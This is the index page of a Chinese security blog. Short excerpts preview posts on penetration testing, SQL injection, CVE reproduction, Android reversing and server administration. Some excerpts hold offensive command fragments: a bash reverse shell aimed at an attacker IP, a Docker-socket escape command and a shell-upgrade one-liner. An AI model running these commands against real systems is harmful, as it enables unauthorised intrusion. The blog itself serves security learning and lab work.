哨兵安全博客 | © 哨兵 | Sentry CyberSecurity

未授权MongoDB：鸿门宴？记一次自己菜鸟的模样渗透中发现一个mongoDB的端口，尝试连上去后发现什么数据都读不到，诚惶诚恐，越往下越感觉和MysqlD Server伪造读取文件的现象接近，乃大恐；战战兢兢如履薄冰，无奈默默打开wireshark，重新连接一次数据库端口，记录之。 fake mysqlD 前置知识：《伪造mysql服务... [BLOG]发布于：2022-04-05. | 未做修改 | By: Bin4xin.

技术沙龙问题相关思路 subtitle test o_O test message. 一、内网提权的手法？内网提权首要的条件是获得接入内网的某台主机或硬件设备的初始权限，以在内网中进一步的权限维持、获取更多信息等为目的，故需要进行相应的权限提升操作。权限提升的操作方式大概有以下两类：纵向提权：低权限用户获得高权限角色的权限。... [BLOG]发布于：2022-03-27. | 并最后修改于：2022-03-27 | By: Bin4xin.

你的sudo更新了吗 “新的漏洞通告发了！快喊运维去打补丁！” 运维：这次的漏洞应该是近期最需要重视的sudo漏洞，因为此次的漏洞可以允许本地用户不需要验证即可获得Root权限。 SUDO简介 sudo 是一个Unix程序，可以让系统管理员为sudoers文件中列出的普通用户提供有限的root权限，同时保留其活动日志。它按照“最小特... [BLOG]发布于：2022-03-25. | 并最后修改于：2022-03-25 | By: Yang2635.

Linux内核参数调优前言在Linux中，/proc/sys下内核文件与配置文件sysctl.conf中变量存在着对应关系，我们需要对内核参数进行修改，可以直接在/etc/sysctl.conf中添加修改，然后使用命令：sysctl –p使其生效。参数调优时，尽量不要盲目修改相关参数，这样做反而可能会导致性能下降，应逐个参数对其调优，然后... [BLOG]发布于：2022-03-25. | 并最后修改于：2022-03-25 | By: Yang2635.

CentOS内核版本升级内核版本定义在Linux系统中，系统内核版本查看可在终端输入如下命令查看 [[email protected] ~]# uname -r 3.10.0-1160.15.2.el7.x86_64 内核版本性质为：主分支ml(main line)，稳定版(stable)，长期维护版lt(long term) 其版本命名格式... [BLOG]发布于：2022-03-25. | 并最后修改于：2022-03-25 | By: Yang2635.

CVE-2022-22947 Spring-Cloud-Gateway-RCE 开源项目 Spring Cloud Gateway 的一个远程代码执行漏洞编号为 CVE-2022-22947 受影响的版本为： 3.1.0 3.0.0 到 3.0.6 旧的不受支持的版本也受影响漏洞挖掘靶场： java -jar spring-gateway-demo-0.0.1-SNA... [BLOG]发布于：2022-03-15. | 未做修改 | By: Bin4xin.

反弹Shell学习记录该文档是自己学习过程中的记录汇集。现将文档整理出来，留作自己的学习记录历程。同时简单举几种示例演示。前言在渗透测试过程中，会经常遇到Linux系统，当我们拿到基本权限后，让Linux来反弹一个Shell出来再正常不过了。因此，在说原理前，先简单说说正向连接与反向连接：正向连接：目标主机打开一个监听端口，攻击者... [BLOG]发布于：2022-01-19. | 并最后修改于：2022-01-19 | By: Yang2635.

SQL注入学习记录该SQL注入文档是自己学习过程中的记录汇集（不涉及WAF拦截或参数过滤），文档中涉及到的数据库管理系统为MySQL。现将文档整理出来，留作自己的学习记录历程。每个注入类型将会有一到两个例子辅助说明。 SQL 整型注入相关知识一、常用函数 1、database()：当前网站使用的数据库。 2、version()：当... [BLOG]发布于：2022-01-17. | 并最后修改于：2022-01-17 | By: Yang2635.

安卓逆向-脱壳学习记录前言 Android上的应用安装文件是apk格式，这个apk文件其实就是个归档文件压缩包，把应用相关的源码、资源文件、配置文件等乱七八糟的东西都简单粗暴的归档打包，其包内文件结构大体如下：文件或目录作用 META-INF/ ... [BLOG]发布于：2022-01-10. | 并最后修改于：2022-01-16 | By: Yang2635.

关于虚函数表的学习过程虚函数表简介 C++面向对象的多态性，这里我们就要涉及到虚函数了，接下来我们将用反汇编来学习虚函数的原理。直接调用与简介调用这里的直接调用和间接调用时汇编层面上的，我们在看反汇编代码的时候经常会看到 call —- (调用函数的那个call)，那这个呢就是直接调用，而还有一种形式是这样的call [—-]那这个... [BLOG]发布于：2022-01-09. | 未做修改 | By: codecat11.

nmap工具的用法及nmap与aquatone工具联动用法 nmap工具的用法 nmap -T4 -A -v 完整全面扫描 nmap用于主机发现，端口扫描，版本扫描的参数： nmap -Pn IP:扫描主机开放端口及MAC地址 nmap IP :用nmap扫描特定的IP地址 nmap -vv IP：用-vv对结果进行详细输出 nmap -p1-端口 IP... [BLOG]发布于：2021-12-23. | 并最后修改于：2021-12-23 | By: D3ch4ng.

实战-某平台SQL注入及UDF提权前言在一次对某授权的平台服务渗透过程中发现网页调用接口存在SQL注入漏洞、所对应MySQL数据库存在相关用户弱口令及UDF提权漏洞，并成功利用UDF提权漏洞实现对内网服务的渗透，下面是渗透记录过程，部分内容会做模糊处理。后台接口SQL注入前面的渗透已成功进入了某系统平台后台，下面是直接基于在某平台后台后展开概述。... [BLOG]发布于：2021-12-06. | 并最后修改于：2021-12-06 | By: Yang2635.

用Github Action有感 Github Actions的简介 GitHub Actions 是 GitHub 的持续集成服务，于2018年10月推出。摘于GitHub Actions 入门教程我更愿意把她叫做Paas(平台服务)；为什么？谈谈我最近这段时间使用的看法：举一个简单的例子：我们在家里怎么做出一块面包？ ... [BLOG]发布于：2021-11-15. | 并最后修改于：2022-02-24 | By: Bin4xin.

备忘录博客的自动化同步问题当前重中之重在与对于博客的自动化同步问题的解决，那么自然需要对当下博客同步进行分析；当下同步流程问题 B4xinSynchronize同步对应仓库 bin4xin.github.io =>git push> www.sentrylab.cn ... [BLOG]发布于：2021-10-26. | 并最后修改于：2021-11-15 | By: Bin4xin.

浅谈实际生产业务中公有云和私有云的边界前言我在WEB渗透的工作中常常会碰到这样的现象：很多企业单位在对自身的资产梳理往往都存在或多或少的问题，如：问题为什么产生？解决？备注资产梳理有遗漏企业单位部分边缘业务外包导致；业务... [BLOG]发布于：2021-10-24. | 并最后修改于：2021-11-11 | By: Bin4xin.

基于Modbus协议与KingView实现Openplc仿真通讯 # 仿真通讯靶场搭建基于Modbus协议与KingView实现Openplc仿真通讯 - 通讯靶场网络示意图如下 # OpenPLC on Linux OpenPLC环境搭建点击以了解OpenPLC $ mkdir ICWR && cd I... [BLOG]发布于：2021-05-07. | 并最后修改于：2021-12-15 | By: Bin4xin.

用友NC6.5java反序列化零：用友nc6.5反序列化依赖jar包 0x01：攻击java代码 import nc.bs.framework.common.NCLocator; import java.util.Properties; public class poc { public static void attack(Str... [BLOG]发布于：2021-03-13. | 并最后修改于：2021-01-24 | By: Bin4xin.

CST 2021年 4月14日星期三：一次朔源事件的记录《Bin4xin：我的网安从业朔源事件记录》零：起源一日，某护网红队支撑群里发了一份朔源报告，鸦雀无声甲方：小伙伴们接集团要求需对 WAF全流量平台攻击ip进行朔源… 废佬：这…（甲方你真可爱） ... [BLOG]发布于：2021-03-13. | 未做修改 | By: Bin4xin.

辛丑·本命年年后的一些思考过完年回合肥已经接近一个月之久了，今年是本命年，也希望自己能够能够比20年更加努力。回了公司就按照计划忙些有意义的：一切正在有条不紊的进行着：按照新年的规划，过来需要沉淀的便是Shiro框架。过完年回来就面临着护网，在20年靠着这个为公司护网“打下了一片江山”，今年应进一步理解；说些没用的：过年回来后... [BLOG]发布于：2021-03-13. | 未做修改 | By: Bin4xin.

有关于网络安全行业的一些思考 Under construction 在当今网络安全行业趋于商业化的时代，如何能够保持一颗赤忱之心：当今网络安全之趋势，当在国家安全的大前提下：教育行业应作为网络安全的”活水源头”，为这个年轻的行业输入足够的年轻血... [BLOG]发布于：2020-09-25. | 未做修改 | By: Bin4xin.

不得不谈的：「Spring Boot」未授权渗透 Spring Boot Vulnerability Exploit CheckList Spring Boot 相关漏洞学习资料，利用方法和技巧合集，黑盒安全评估 check list 声明这是转载地址，若作者介意请联系：「[email protected]」删除转载文章零：路由和版本 0x01：路由知... [BLOG]发布于：2020-09-25. | 未做修改 | By: Bin4xin edited. Source from LandGrey.

「排错」：Docker启动vulnhub报错排错最近在做靶场漏洞复现的时候发现了一个由web虚拟机和db虚拟机一起跑起来的联动靶场环境，下载完镜像后总是报错，思前想后都没办法，于是只能自己来解决问题，虽然结果令人大失所望，但是过程还是挺让人有成就感的，就记录了一下。 #docker启服务进入相对应的靶场环境文件夹下起靶场： [email protected]'s Macb... [BLOG]发布于：2020-09-11. | 未做修改 | By: Bin4xin.

「技巧」：Linux & Unix Terminal小技巧 grep grep -n "get_spg2lsf" -r ./ 在当前文件夹下查找包含get_spg2lsf字符串的文件 vim 快速删除 1、删除每行前10个字符： :%s/^.\{10\}// 其中，%表示所有行，s表示替换，”%s”可用”1,$”代替（下同）；正则表达式”/^.{10... [BLOG]发布于：2020-09-01. | 未做修改 | By: Bin4xin.

「安全工具」:A-Web_Vuln_Scan和aq域名爆破工具 aq域名工具此处仅仅对于aq工具的报错进行部分记录，若存在无法解决的问题可以自行查询其他师傅的文章。 gem换源 gem安装软件之前一定要换源； gem sources --add https://gems.ruby-china.com/ --remove https://rubygems.org/ npm ... [BLOG]发布于：2020-06-21. | 未做修改 | By: Bin4xin.

「Fuzz」:浅谈一些模糊匹配搜集信息的技巧写在文前：我们在web攻防期间有很多时候有一种感觉：那就是遇到rce漏洞时，bp放包的时候有一种隐隐的感觉，有的时候bp的反包字节大小莫名其妙的怪异，有经验的老师傅就索性直接跑RCE的fuzz字典，所以本篇就日常记录一些有关于web攻防期间的一些fuzz技巧服务器RCE的fuzz技巧 Windows机... [BLOG]发布于：2020-06-10. | 未做修改 | By: Bin4xin.

「信息搜集」:漫谈一些在内网的信息搜集技巧经历过几次HW行动，每次HW都运气较好可以拿到服务器，于是每次公司的内网渗透的任务就交给我，记录一下对于内网的信息搜集过程，以及在此过程中我自己所积累的小技巧。 2021年 3月19日星期五 16时37分27秒 CST更新重构了部分小结的展示：重新调整了文章的阐述框架，尽可能从实战角度出... [BLOG]发布于：2020-06-08. | 并最后修改于：2021-03-19 | By: Bin4xin.

「Docker」:use docker elegant:) 网上有很多关于vulhub的docker构建教程，就不重复造轮子了。记录一些日常使用dokcer遇到的问题 docker常用连接重置 Burp Suite Professional Error Connection reset 当前无法使用此页面当前无法处理此请求。HTTP ERROR 503 之前做一个st... [BLOG]发布于：2020-05-27. | 未做修改 | By: Bin4xin.

「Struts2」:Apache-Struts2框架漏洞复现 s2-001 struts2-001该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所... [BLOG]发布于：2020-05-26. | 未做修改 | By: Bin4xin.

「BASH」:谈谈完全交互式的终端写在前面，本方法适用于在反弹shell后把shell提升为完全交互式shell，也是自己实战了一段时间后摸索出来的，记一下笔记完美的交互式shell python $ python -c "import pty; pty.spawn('/bin/bash')" # 输入 Ctrl+Z $ stty raw -echo... [BLOG]发布于：2020-05-20. | 未做修改 | By: Bin4xin.

「fastjson」:浅谈json的反序列化 fastjson指纹特征访问页面，查看反包是一个指定的json格式的数据。请求包： GET / HTTP/1.1 Host: underattack-host:8090 Cache-Control: max-age=0 DNT: 1 Upgrade-Insecure-Requests: 1 User-Agent: Mozi... [BLOG]发布于：2020-05-19. | 未做修改 | By: Bin4xin.

「DOCKER」:谈谈docker逃逸那点事 Google Cloud Shell Docker逃逸 sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest Welcome to Cloud Shell! Type "help" to get started. Your Clou... [BLOG]发布于：2020-05-17. | 未做修改 | By: Bin4xin.

「渗透」:SQL注入新姿势:) 由于一些机缘巧合，发现了一些SQL注入的新姿势，记录一下；记录就是一个简单的练手记录，感觉非常有意思；目标确定在shodan、fofa上搜asmx，找到疑似存在wsdl注入的站，大概的是这样的：http://vuln_ip:8081/WebService1.asmx?WSDL，一般我们可以通过手工的方式去尝试... [BLOG]发布于：2020-05-15. | 未做修改 | By: Bin4xin.

「安卓」:使用rootCloak绕过root权限监测 gradle打包 https://blog.csdn.net/EthanCo/article/details/52064044 https://www.kutu66.com/GitHub/article_105897 https://jingyan.baidu.com/ar... [BLOG]发布于：2020-05-15. | 未做修改 | By: Bin4xin.

「渗透」:一句话反弹docker-shell 一句话木马反弹shell 前提：现在情况是已经上传了一句话木马，可以执行命令如：ls,pwd,whoami等；问题在于，不管用python、bash还是perl都反弹不了（如下），偷不了懒，就上msf把。 http://target-ip/where/muma/path/are/15878082797... [BLOG]发布于：2020-04-27. | 未做修改 | By: Bin4xin.

「Terminal」:pip报错'unkown-encoding' 可怖的unkown encoding. 自从修改了windows终端的编码格式后，就出了各种问题，几乎在终端上执行的软件都运行不了，提示LookupError: unknown encoding: cp65001，如下报错。 C:\Users\本阿信>pip --version Traceback (mos... [BLOG]发布于：2020-04-01. | 未做修改 | By: Bin4xin.

「资产扫描」:Let's GyoiThon ! title:GyoiThon Scanner 1 下载依赖项下载源文件后，进入文件夹路径，根据python的依赖进行安装，即requirements.txt文件： PS G:\GyoiThon> pip install -r requirements.txt DEPRECATION: Python 2.7... [BLOG]发布于：2020-01-21. | 未做修改 | By: Bin4xin.

Maven构建项目相关一揽子知识 2020/01/21更新； Thu, 26 Aug 2021 14:50:02 +0800再次更新；序本文主要是对于在漏洞复现犹其是Maven poc项目代码的部分个人总结师傅最近让我看freebuf上一篇关于jeeplus代码审计的文章，文章讲的是不错的，自己找了个项目来做，之前没有java开发的基... [BLOG]发布于：2020-01-19. | 并最后修改于：2021-08-26 | By: Bin4xin.

「笔记」：fortify-error-no-rules-file-found 最近在接触代码审计的活儿。碰到了一些问题，随手记录下来；错误描述：当fortify开始java代码分析时，报错No rules files found; 1.错误描述谷歌一波关键词[error]: No rules files found：问题引出 stackoverflow原问题： When I ... [BLOG]发布于：2020-01-07. | 未做修改 | By: Bin4xin.

「scrcpy」:Linux中优秀的投屏软件～ macOS 2022/03/30/17:13:08 添加macOS用法用scrcpy主要是因为开源且干净，先上效果图。安装也很简单： brew install scrcpy 不过当时我一直报错： Error: [email protected]: the bottle needs the Apple ... [BLOG]发布于：2019-12-31. | 并最后修改于：2022-03-30 | By: Bin4xin.

「笔记」：反弹shell的几种方法记录：关于bash shell的反弹:)随笔记假定环境： kali被攻击机器；ip:192.168.3.32 iZj6cgn7odv59wmjjhe6zwZ攻击机；ip:47.52.233.92 1.bash [email protected]:/# bash -i >&/dev/tcp/47.52.233.... [BLOG]发布于：2019-12-30. | 未做修改 | By: Bin4xin.

Mod-Security：有关「WAF」的爱恨情仇目录 “朝花夕拾” 1.运行环境 2.安装配置 3.规则库配置 4.总结添加于2021/02/05 “朝花夕拾” 这篇与WAF相关”技术”博客其实没有多少技术含量，只是当时刚刚接触到WAF，感觉非常的新鲜然后有了这篇博客，其实当时连LINUX基础常识都还不是非常的了解，年少轻狂的来配置WAF... [BLOG]发布于：2019-12-25. | 未做修改 | By: Bin4xin.

「安卓渗透」:Amazing drozer Scanning frame 直接上链接，不多bb。有空写实战：）参考文档：安卓渗透框架－Drozer架构浅析–架构组成和自定义模块一、drozer运行概述跟Frida-Hook框架运行模式差不多，均为C/S模式。 1）移动端：drozer-agent启动pc-drozer框架前需打开droze... [BLOG]发布于：2019-12-18. | 未做修改 | By: Bin4xin.

「安卓渗透」： Let's hook APK with frida～忙里偷闲，本文是记录Hook-Frida框架，如何使用Frida注入代码，做到对安卓apk进行代码hook注入。 Frida框架准备 1.frida框架安装 frida框架为C/S模式，即客户端、服务端模式： 1）一部分是运行在客户端上的命令行交互工具：Frida CLI。 2）另一部分是运行在目标机... [BLOG]发布于：2019-12-15. | 未做修改 | By: Bin4xin.

NGINX笔记：http升级https协议窈窕HTTPS，正是TCP的好逑； how to used http to https with nginx? Is’s sounds fantastic! 其实证书早就颁发下来了，一直配置配不成功（小声bb）。纪念一下，2019-12-13号，站点升级为https协议。嘿嘿 1.安装libssl库 sudo ... [BLOG]发布于：2019-12-07. | 未做修改 | By: Bin4xin.

「排错」：php-fpm解析404-not found php+nginx解析错误，报错404-Not Found 前言容器内是自己写的个人博客，处于安全考虑用的是静态页面博客。但是由于公网维护博客较为困难，加上之前用的开源存储云服务项目，那么就需要php来解析，所以打算试一试能不能「nginx+php」的方式方便个人维护博客。所以本菜最终想完成的是这样的： ... [BLOG]发布于：2019-12-04. | 未做修改 | By: Bin4xin.

「安卓渗透」：天之骄子ADB adb简介 adb（Android Debug Bridge）Android调试桥是一种功能多样的命令行工具，可让设备之间（PC端和移动端）进行通信。 adb 命令便于执行各种设备操作（例如安装和调试应用），并提供对 Unix Shell（可用来在设备上运行各种命令）的访问权限。它是一种客户端-服务器程序。一、adb连... [BLOG]发布于：2019-11-30. | 未做修改 | By: Bin4xin.

多子域：JEKYLL优雅地部署于NGINX 本文主要介绍服务端的Jekyll站点部署方法，以及相关的一揽子问题及解决方案；于 2021年 6月27日星期日 20时19分07秒 CST修改，个人建议优雅地使用：阐述Jekyll的工作问题；解决多子域问题：nginx配置文件，使得nginx文件配置更加容易移植、运维…. 解决Web代码更新... [BLOG]发布于：2019-11-22. | 并最后修改于：2021-06-27 | By: Bin4xin.

Docker环境下T-pot蜜罐部署记录摘要:最近在网上冲浪看到一个开源蜜罐项目，看到是基于web的蜜罐项目，web页面是真好看。突发奇想正好手头有个公网ip，最近也在为论文数据来源发愁，索性来试试看。先说结论，安装失败。本篇持续更新～（滑稽）看介绍项目的帖子说，最新版T-pot 18是基于ubuntu server 1... [BLOG]发布于：2019-11-21. | 未做修改 | By: Bin4xin.

「笔记」：Jekyll for linux.服务器部署历程申明：背景图来自微博@胡歌，侵删～不过胡歌这么可爱应该不会介意的第一个问题：这玩意儿是什么？通俗的来讲： Jekyll = web server + static blog + front end UI 如果你想拥有一个自己的博客但是苦于数据库没学好，你可以来试试看；再如果想学前端，你也可以试试看～做配置前请... [BLOG]发布于：2019-11-18. | 未做修改 | By: Bin4xin.

「移植」Ubuntu With Arm公网存储容器搭建记录声明：本文章首发于华为云鲲鹏社区，同步于作者个人博客:) 鲲鹏云服务器Ubuntu 18.04 64bit with ARM PHP+NGINX软链接演示摘要：华为云社区的活动好多～最近领了个ARM云服务器。打算用服务器搭建一个云存储服务容器方便自己上传论文，说干就干，于是就是在网上找了个开源的项目。下... [BLOG]发布于：2019-09-01. | 未做修改 | By: Bin4xin.

「FINDOMAIN」：跨平台子域名搜集工具摘要:之前在暑假里申请注册了个云先知平台账号，平时没事闲（mo）着（yang）的（gong）时候当当土拨鼠挖挖洞。挖过的都懂，是一个类似于渗透测试的中心化平台。乙方公司有这个需求，通过这个平台发放任务，通过不同的漏洞等级【严重】-【高危】-【中危】-【低危】，严重就是危及到服务器权限，能够get web shell、root... [BLOG]发布于：2019-09-01. | 未做修改 | By: Bin4xin.

「渗透」SVG的神秘力量：minUv2 categories: blog Web 漏洞复现渗透 vulnhub 序言 hello,各位。最近闲来无事，工作之余偷偷用公司电脑测试入侵了一个linux靶机，遂记录下。（手动狗头）这个靶机本身难度适中，复现了svg的代码执... [BLOG]发布于：2019-09-01. | 未做修改 | By: Bin4xin.

「渗透」:PumpkinRaising-密码学的奥义序言 hello,各位看官。最近忙里偷闲花了两天时间测试入侵了一个linux靶机，遂记录下。这个靶机我觉得挺适合刚入门的有一些基础的白帽子，对就是你！，大部分flag都是利用一些工具来获得。大佬看客笑看便是（手动狗头）。整篇记录的都是小弟的思路，看官们跟着小弟的思路看就是了，会有些乱。见笑。一、靶机靶机来自vulnhu... [BLOG]发布于：2019-07-15. | 未做修改 | By: Bin4xin.

Search/搜索 `Ctrl ⌃` + `F`

e.g. Nginx：

NGINX笔记：http升级https协议

多子域：JEKYLL优雅地部署于NGINX